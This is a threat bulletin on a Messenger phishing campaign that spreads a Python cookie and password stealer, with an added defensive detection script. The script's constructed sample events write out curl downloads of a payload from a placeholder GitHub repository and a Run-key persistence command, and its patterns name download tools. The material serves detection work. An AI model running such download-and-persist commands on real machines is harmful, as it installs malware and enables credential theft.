Facebook Messenger Phishing Wave Targets 100K Business Accounts Per Week

Cyber Security Threat Summary:
“Hackers use a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages to target Facebook business accounts with password-stealing malware. The attackers trick the targets into downloading a RAR/ZIP archive containing a downloader for an evasive Python-based stealer that grabs cookies and passwords stored in the victim's browser. In a new report by Guardio Labs, researchers warn that roughly one out of seventy targeted accounts is ultimately compromised, translating to massive financial losses. The hackers start by sending Messenger phishing messages to Facebook business accounts pretending to be copyright violations or requests for more information about a product. The attached archive contains a batch file that, if executed, fetches a malware dropper from GitHub repositories to evade blocklists and minimize distinctive traces. Along with the payload (project[.]py), the batch script also fetches a standalone Python environment required by the infostealing malware and adds persistence by setting the stealer binary to execute at system startup. The project[.]py file features five layers of obfuscation, making it challenging for AV engines to catch the threat. Finally, the stealer wipes all cookies from the victim's device to log them out of their accounts, giving the scammers enough time to hijack the newly compromised account by changing the passwords” (Bleeping Computer, 2023).

Security Officer Comments:
Researchers at Guardio Labs observed roughly 100,000 phishing messages being sent per week, with targets in North America, Europe, Australia, Japan, and Southeast Asia. The exact number of hijacked accounts is unclear, since some recipients may not yet have executed the batch file, which is required for a successful infection. According to Guardio Labs, approximately 7% of all Facebook business accounts have been targeted in this campaign, and 0.4% of those have downloaded the malicious archive.

Guardio Labs attributes this campaign to Vietnamese hackers based on strings found in the malware and its use of 'Coc Coc', a web browser that is very popular in Vietnam. Similar phishing attacks have been launched in the past: in May 2023 Facebook disrupted a Vietnam-originated campaign that used a new info-stealing malware dubbed 'NodeStealer' to extract browser cookies.

Suggested Correction(s):
With phishing as the initial attack vector for this campaign, users should be cautious when opening links or attachments from unknown senders, and in particular should not extract and run a batch file delivered inside an archive, since executing that file is the step this chain requires before any infection occurs. Guardio Labs has also published IOCs in its report (linked below) which can be used for detection purposes.
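Beyond the published IOCs, the infection chain described in the summary can be detected behaviourally, which survives the attackers rotating GitHub repositories. The script below is an added example, not code from Guardio Labs, Bleeping Computer, or the campaign itself. It runs four indicators over process-creation events: a batch file launched from a user-writable directory, a download from GitHub spawned by that batch file, a Python interpreter executing project.py from a user-writable path, and a Run-key or Startup-folder persistence entry pointing at that interpreter. The event format, field names, user and file paths, and the GitHub URL in the sample events are constructed assumptions for illustration.

```python
"""Behavioural detection for the archive -> batch -> GitHub -> Python stealer chain.

Added example, not the researchers' or the malware's code. The ProcEvent shape is an
assumed, simplified process-creation record; the sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable that started
    cmdline: str   # full command line


# Locations an unprivileged user can write to. A standalone Python interpreter or a
# script under one of these is suspicious; a normal install lives under Program Files.
USER_WRITABLE = re.compile(
    r"(?:\\Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Temp\\)",
    re.IGNORECASE,
)
GITHUB_URL = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/", re.IGNORECASE)
FETCH_TOOLS = {"curl.exe", "powershell.exe", "pwsh.exe", "bitsadmin.exe", "certutil.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)

# One tag per stage of the chain described in the article.
STAGES = (
    "batch_from_user_dir",          # archive contents executed
    "github_fetch",                 # dropper / Python env pulled from GitHub
    "user_dir_python_project_py",   # standalone interpreter runs project.py
    "startup_persistence_python",   # stealer set to run at startup
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def event_indicators(ev: ProcEvent, by_pid: dict) -> list:
    """Tags raised by one event; the parent event supplies process-tree context."""
    hits = []
    name = basename(ev.image)
    cmd = ev.cmdline
    parent = by_pid.get(ev.ppid)

    # Stage 1: cmd.exe running a .bat that sits in a user-writable directory.
    if name == "cmd.exe" and re.search(r"\.bat\b", cmd, re.IGNORECASE) and USER_WRITABLE.search(cmd):
        hits.append("batch_from_user_dir")

    # Stage 2: a download tool pulling content from GitHub, ideally as a child of that batch.
    if name in FETCH_TOOLS and GITHUB_URL.search(cmd):
        hits.append("github_fetch")
        if parent is not None and basename(parent.image) == "cmd.exe" and ".bat" in parent.cmdline.lower():
            hits.append("fetch_spawned_by_batch")   # context tag, not a stage

    # Stage 3: a Python interpreter located in a user-writable path executing project.py.
    if name in ("python.exe", "pythonw.exe") and USER_WRITABLE.search(ev.image) \
            and re.search(r"project\.py\b", cmd, re.IGNORECASE):
        hits.append("user_dir_python_project_py")

    # Stage 4: Run-key or Startup-folder persistence whose target is a user-dir Python.
    if (RUN_KEY.search(cmd) or STARTUP_DIR.search(cmd)) \
            and re.search(r"python\w*\.exe", cmd, re.IGNORECASE) and USER_WRITABLE.search(cmd):
        hits.append("startup_persistence_python")
    return hits


def analyse(events: list) -> dict:
    """Per-event findings plus a verdict based on how many chain stages were observed."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in events:
        hits = event_indicators(ev, by_pid)
        if hits:
            findings[ev.pid] = hits
    stages_seen = {h for hits in findings.values() for h in hits if h in STAGES}
    if len(stages_seen) >= 3:
        verdict = "likely_infection_chain"
    elif stages_seen:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "stages": sorted(stages_seen), "findings": findings}


# Constructed sample telemetry (paths, user name and repository are placeholders).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\Downloads\Copyright_Violation_Notice\Notice.bat"'),
    ProcEvent(201, 200, r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\Users\alice\AppData\Local\Temp\project.py "
              r"https://raw.githubusercontent.com/example-user/example-repo/main/project.py"),
    ProcEvent(202, 200, r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\Users\alice\AppData\Local\Temp\python.zip "
              r"https://raw.githubusercontent.com/example-user/example-repo/main/python.zip"),
    ProcEvent(203, 200, r"C:\Windows\System32\reg.exe",
              r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d '
              r'"C:\Users\alice\AppData\Local\Temp\python\pythonw.exe C:\Users\alice\AppData\Local\Temp\project.py" /f'),
    ProcEvent(204, 200, r"C:\Users\alice\AppData\Local\Temp\python\pythonw.exe",
              r"pythonw.exe C:\Users\alice\AppData\Local\Temp\project.py"),
    # Benign control: the system-wide interpreter running a developer's own project.py.
    ProcEvent(300, 100, r"C:\Program Files\Python311\python.exe",
              r'"C:\Program Files\Python311\python.exe" C:\Users\alice\Documents\project.py'),
]

if __name__ == "__main__":
    print(analyse(SAMPLE_EVENTS))
```

The verdict requires several distinct stages rather than any single hit, so a developer running a script called project.py with a normally installed interpreter (the benign control above) raises nothing, while the chain in the sample events trips all four stages. In a real deployment the same four checks map onto Sysmon event ID 1 or EDR process-creation telemetry, with the Run-key check supplemented by registry-set events.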

Link(s):
https://www.bleepingcomputer.com/
https://labs.guard.io/